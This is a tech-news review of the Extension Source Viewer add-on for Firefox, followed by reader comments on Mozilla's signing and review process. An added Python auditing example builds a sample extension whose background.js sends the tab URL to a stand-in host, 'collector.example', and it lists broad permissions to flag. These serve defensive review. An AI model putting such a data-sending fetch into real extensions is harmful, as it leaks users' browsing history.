Extension Source Viewer for Firefox
Extension Source Viewer is a free browser add-on for the Firefox web browser that enables you to view the source code of Firefox add-ons and Chrome extensions.
It is recommended to verify that browser add-ons are legitimate before you install them in your browser. The reason for this is simple: browser extensions may record, transfer, or change what you do on the Internet.
Malicious extensions may grab passwords or sensitive information you enter, others may throw annoying ads on sites you visit, and a third kind may record your browsing history and create profiles to sell them to the highest bidder.
While you may get some reassurance by reading user reviews and ratings, or looking at the extension's track record, it may not be enough for the vast majority of extensions out there.
New extensions for instance may not have any ratings yet, and they don't have a track record either.
The only surefire way of making sure that an extension is legitimate and not malicious or problematic is to look at the source code.
Extension Source Viewer for Firefox
Extension Source Viewer for the Firefox web browser supports Firefox add-ons and Chrome extensions.
It shows an icon in Firefox's address bar when it detects an extension on a page, and may also be activated from the right-click context menu.
The main difference between the two is that the address bar icon also supports downloading the extension as a zip file, in addition to viewing its source directly in the browser.
The viewing of the source code works pretty much as you'd expect it to. Once you select the option, the source code of the extension is opened in a new tab.
Since it is made up of multiple files, you get a listing of all those files on the left to quickly go through them. Selecting a file displays its code on the right.
You may use the filter option on top of the file listing to find particular files quickly. One interesting option is the ability to filter certain types of files. You may hide images or locales for instance to reduce the number of files listed on the left.
The source code uses color coding, but that is about it. You may select and copy any code, which may come in handy if you want to research certain functions.
The links at the top right open the page of the extension on the official repository, download it to the local system, or load an open dialog that enables you to load another browser add-on to view its source.
Good news is that the add-on supports both Firefox add-ons and Chrome extensions. Since you may load a percentage of Chrome extensions in Firefox, it is good that the extension supports Chrome extensions as well.
The Firefox add-on works for the most part like its Chrome cousin Chrome Extension Source Viewer.
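The same first look at an extension can be scripted once it has been downloaded as a zip file: read the manifest for broad permissions, skip images and locales, and note which script files reference remote hosts. The Python below is an added example, not part of Extension Source Viewer or the original article; the sample archive, the `collector.example` host and the short list of broad permissions are constructed assumptions.

```python
import io
import json
import re
import zipfile

# Permissions that give an extension wide access to browsing data.
# Illustrative assumption for this example, not a complete policy.
BROAD_PERMISSIONS = {"<all_urls>", "tabs", "history", "webRequest", "cookies"}
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+")


def build_sample_xpi() -> bytes:
    """Build a small constructed extension archive in memory (sample data)."""
    manifest = {"manifest_version": 2, "name": "Sample (constructed)", "version": "1.0",
                "permissions": ["tabs", "storage", "<all_urls>"],
                "background": {"scripts": ["background.js"]}}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", json.dumps(manifest))
        zf.writestr("background.js",
                    'fetch("https://collector.example/log?u=" + tab.url);\n')
        zf.writestr("icons/icon.png", b"\x89PNG")
        zf.writestr("_locales/en/messages.json", "{}")
    return buf.getvalue()


def audit_extension(archive: bytes) -> dict:
    """Summarise what a reviewer would look at first in an extension archive."""
    report = {"broad_permissions": [], "scripts": [], "remote_origins": {}}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        manifest = json.loads(zf.read("manifest.json").decode("utf-8-sig"))
        # Manifest V2 mixes host patterns into "permissions"; V3 uses "host_permissions".
        requested = manifest.get("permissions", []) + manifest.get("host_permissions", [])
        report["broad_permissions"] = sorted(
            p for p in requested if isinstance(p, str) and p in BROAD_PERMISSIONS)
        for name in zf.namelist():
            if not name.endswith((".js", ".html")):
                continue  # skip images and locales, like the viewer's file-type filter
            report["scripts"].append(name)
            text = zf.read(name).decode("utf-8", errors="replace")
            for origin in set(URL_RE.findall(text)):
                report["remote_origins"].setdefault(origin, []).append(name)
    return report


if __name__ == "__main__":
    print(json.dumps(audit_extension(build_sample_xpi()), indent=2))
```

Real `manifest.json` files may contain `//` comments, which `json.loads` rejects; strip them before parsing if the load fails.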
The source of an add-on published on AMO is available on its page / Version Information / View the source. This add-on IMO could be worthy for add-ons which have been removed from AMO and for external add-ons (non-signed? Hum…).
Whatever, even for non-specialists or Sunday coders viewing the source can provide indeed valuable information. I’ve more than once had a look at the add-on’s anatomy to figure out if and where any external calls were performed by the add-on. But adding an add-on to view other add-ons’ source seems to me slightly “hair splitting” … not to mention that a Firefox add-on has a simple zip format renamed xpi : reverse the extension and open it is a breeze, even for me.
This is unnecessary. FF extensions need to be signed to be installed, and to be signed they need to be reviewed by Mozilla.
It’s different from Chrome, Google does not check anything at all, that’s why malware and friends are everywhere there.
Signing is an automatic process, isn't it?
Yes, signing is an automatic process, it does not require a code review.
Code review is automatic, too, like on Google Play for Android apps. If an extension is signed, I don’t think there is a case where it has not been reviewed as well. (Only exception could be for internal extensions made by businesses for their employees. Extensions that never leave an internal network are subjected to a different mechanism that I never bothered checking.)
Still, malware is not spyware, and it’s great to be able to check source code in readable format in just a few clicks. Can’t do that with smartphone apps.
There is an automatic code validation, but the review is a manual process. Add-ons on AMO should be reviewed, but it has nothing to do with the signing. That’s an important distinction because add-ons don’t need to be hosted on AMO. And a review can take a few days. You can share a link of a not yet reviewed add-on, so we can’t say that every add-on on AMO is reviewed. But add-ons with a green install button are reviewed for sure. ;)
True that there are signed add-ons elsewhere than on AMO itself.
For example this one, ‘Bookmark Favicon Changer’ developed by Sonthakit, fed up by Mozilla reviews for reasons he explains on his page but nevertheless signed (no way to avoid that) :
I guess we all give more importance to signing than to reviewing.
We were debating over Firefox’s WebExtensions’ new extension architecture here on Ghacks with the ‘The State of Mozilla Firefox’ article. Hopefully this new WebExtensions will defeat the reasons provided by the above mentioned developer.
Right, AMO has manual review, so indeed add-ons on AMO with the green button should be even safer than Google Play’s apps :)
But signed add-ons distributed outside of AMO have some level of guarantee too. How much is “some” I don’t know, one would need to check what exactly the verification algorithm is looking for. One of the advertised advantages of signing is that it protects people’s Firefox from misbehaving extensions bundled in programs that they install. So for that, the verification algorithm must check for more than just compatibility, it must check behaviour too.
Anyway here’s what Mozilla says about the process:
“For unlisted add-ons, files submitted for signing will go through an automated review process. If they pass this review, they are automatically signed and a download link is sent back to the developer. This process should normally take seconds. If the file doesn’t pass review, the developer will have the option to request a manual review, which should take less than two days. This is not the same process that currently applies to AMO add-ons, which has been typically slower.”
The average PC user (not a software developer) will not understand what the source code is doing.
Unneeded and most probably harvesting “addon”.
XPI File is nothing more than a ZIP File…
> The Firefox add-on works for the most part like its Chrome cousin Chrome Extension Source Viewer.
Not cousin, but more like identical twins! The Firefox version is implemented as a WebExtension itself (you can see the source at https://github.com/Rob--W/crxviewer).
I agree with Tom on this, no need for this addon, just use the page on AMO or download the file and extract it if the source code is not visible on AMO. One great thing about the AMO source code viewer is that it’s very easy to compare two versions of an addon, so if there’s a not-very-descriptive changelog for a new version you can quickly and very easily look at exactly what code-changes were made in the new version.